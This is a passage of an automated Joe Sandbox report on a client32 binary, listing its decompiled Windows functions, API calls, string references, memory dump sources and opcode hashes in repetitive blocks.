                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    • m_hWnd, xrefs: 110010A6
                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010A1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$ErrorExitItemLastProcessSendwsprintf
                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                    • API String ID: 2046328329-2830328467
                                                                                                                                                    • Opcode ID: c226bf07a577de758f5b5d732fabc6726861ac1fed5afbb268a848974a3c6e27
                                                                                                                                                    • Instruction ID: 55addf44b20248d1cdc7b1377ce96882c1c4f69405d532d8ba5fa0b62c56eca9
                                                                                                                                                    • Opcode Fuzzy Hash: c226bf07a577de758f5b5d732fabc6726861ac1fed5afbb268a848974a3c6e27
                                                                                                                                                    • Instruction Fuzzy Hash: 8DE01AB661021DBFD714DE85EC81EEBB3ECEB49354F008529FA2A97240D6B0E850C7A5
                                                                                                                                                    Function 11001050 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageA.USER32(?,?,?,?), ref: 11001083
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    • m_hWnd, xrefs: 11001066
                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001061
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                    • API String ID: 819365019-2830328467
                                                                                                                                                    • Opcode ID: 3c93d44872c95809d5d96296b6c43cba7727a5ea0dc913bc3fcb2418da055862
                                                                                                                                                    • Instruction ID: 50f06fe94c134d50a88b9402c61dae4da10641179b5ac6344e644b67b4693846
                                                                                                                                                    • Opcode Fuzzy Hash: 3c93d44872c95809d5d96296b6c43cba7727a5ea0dc913bc3fcb2418da055862
                                                                                                                                                    • Instruction Fuzzy Hash: 6AE04FB5A00219BBD710DE95DC45EDBB3DCEB48354F00842AF92597240D6B0F84087A0
                                                                                                                                                    Function 110010E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • PostMessageA.USER32(?,?,?,?), ref: 11001113
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    • m_hWnd, xrefs: 110010F6
                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010F1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$ErrorExitLastPostProcesswsprintf
                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                    • API String ID: 906220102-2830328467
                                                                                                                                                    • Opcode ID: 81e23b17fbda055fd9539ba62cc9f5d3a9ce7d810db27e0af83b2e8161869047
                                                                                                                                                    • Instruction ID: 934a8ee4ae924c1029923c78eea6d07b507986f249d0d3e5c029bc3c62824ea9
                                                                                                                                                    • Opcode Fuzzy Hash: 81e23b17fbda055fd9539ba62cc9f5d3a9ce7d810db27e0af83b2e8161869047
                                                                                                                                                    • Instruction Fuzzy Hash: 98E04FB5A10219BFD704CA85DC46EDAB39CEB48754F00802AF92597200D6B0E84087A0
                                                                                                                                                    Function 110151A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageA.USER32(?,00001014,?,?), ref: 110151D4
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    • m_hWnd, xrefs: 110151B6
                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110151B1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                                                                                    • API String ID: 819365019-3966830984
                                                                                                                                                    • Opcode ID: 9426acf8e79a86d963c2fc4e4fe9e0b3a848eac582adc7d94dbc3e0bf9044144
                                                                                                                                                    • Instruction ID: 66f1678c741d69056f24fb38e5f1926d93c7d4e0e7c38f0779b183b432510f86
                                                                                                                                                    • Opcode Fuzzy Hash: 9426acf8e79a86d963c2fc4e4fe9e0b3a848eac582adc7d94dbc3e0bf9044144
                                                                                                                                                    • Instruction Fuzzy Hash: 26E08675A403197BD310DA81DC46ED6F39CDB45714F008025F9595A240D6B1B94087A0
                                                                                                                                                    Function 110171F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageA.USER32(?,0000101C,?,00000000), ref: 11017222
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    • m_hWnd, xrefs: 11017206
                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11017201
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                                                                                    • API String ID: 819365019-3966830984
                                                                                                                                                    • Opcode ID: 60a1b6a3ee2cbd739f663da181e31c22685e6289d91970e62bf161fdfa926ba2
                                                                                                                                                    • Instruction ID: ca461658ff4ad9fd457e958dedcd80386c4d58b841a73ce1d2056031be29817f
                                                                                                                                                    • Opcode Fuzzy Hash: 60a1b6a3ee2cbd739f663da181e31c22685e6289d91970e62bf161fdfa926ba2
                                                                                                                                                    • Instruction Fuzzy Hash: 54E0C275A80329BBE2209681DC42FD6F38C9B05714F004435F6196A182D5B0F4408694
                                                                                                                                                    Function 11001120 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ShowWindow.USER32(?,?), ref: 1100114B
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    • m_hWnd, xrefs: 11001136
                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001131
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorExitLastMessageProcessShowWindowwsprintf
                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                    • API String ID: 1604732272-2830328467
                                                                                                                                                    • Opcode ID: 29a8f3e74b10ecb473689528bebe8d9fb683c07999dd0dfdb1f1582f8126aa29
                                                                                                                                                    • Instruction ID: 819250d5e51c5ae6cd1eebd62df6884d4c995cad7bb4673794d6e20848bff6e8
                                                                                                                                                    • Opcode Fuzzy Hash: 29a8f3e74b10ecb473689528bebe8d9fb683c07999dd0dfdb1f1582f8126aa29
                                                                                                                                                    • Instruction Fuzzy Hash: A0D02BB191032D7BC3048A81DC42ED6F3CCEB04365F004036F62656100D670E440C3D4
                                                                                                                                                    Function 11001000 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19timeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • KillTimer.USER32(?,?), ref: 1100102B
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    • m_hWnd, xrefs: 11001016
                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001011
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorExitKillLastMessageProcessTimerwsprintf
                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                    • API String ID: 2229609774-2830328467
                                                                                                                                                    • Opcode ID: 41ac2f8117c1c669daa6b7824a22dc0040faad1d84520ef1f3ec06ac7ff731c9
                                                                                                                                                    • Instruction ID: 3936fa5a6487bcfb2675ba24450813cfe8c9b001fa673c8171921283ac7246b0
                                                                                                                                                    • Opcode Fuzzy Hash: 41ac2f8117c1c669daa6b7824a22dc0040faad1d84520ef1f3ec06ac7ff731c9
                                                                                                                                                    • Instruction Fuzzy Hash: C8D02BB66003287BD320D681DC41ED6F3CCD708354F004036F51956100D5B0E840C390
                                                                                                                                                    Function 1100D5E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetVersion.KERNEL32(1100D85E,?,00000000,?,1100CB7A,?), ref: 1100D5E9
                                                                                                                                                    • LoadLibraryA.KERNEL32(AudioCapture.dll,?,1100CB7A,?), ref: 1100D5F8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LibraryLoadVersion
                                                                                                                                                    • String ID: AudioCapture.dll
                                                                                                                                                    • API String ID: 3209957514-2642820777
                                                                                                                                                    • Opcode ID: 047088f675874291a047ed730703cd504129d7fac9f2a2c6fa5c74864475883a
                                                                                                                                                    • Instruction ID: 371e9eeab2a9ec736c68531bc0ba6d51211132de28c640fd63a90ee5c1cea0f0
                                                                                                                                                    • Opcode Fuzzy Hash: 047088f675874291a047ed730703cd504129d7fac9f2a2c6fa5c74864475883a
                                                                                                                                                    • Instruction Fuzzy Hash: BEE0173CA411678BFB028BF98C4839D7AE0A70468DFC400B0E83AC2948FB698440CF20
                                                                                                                                                    Function 11113160 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • FindWindowA.USER32(MSOfficeWClass,00000000), ref: 1111316A
                                                                                                                                                    • SendMessageA.USER32(00000000,00000414,00000000,00000000), ref: 11113180
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
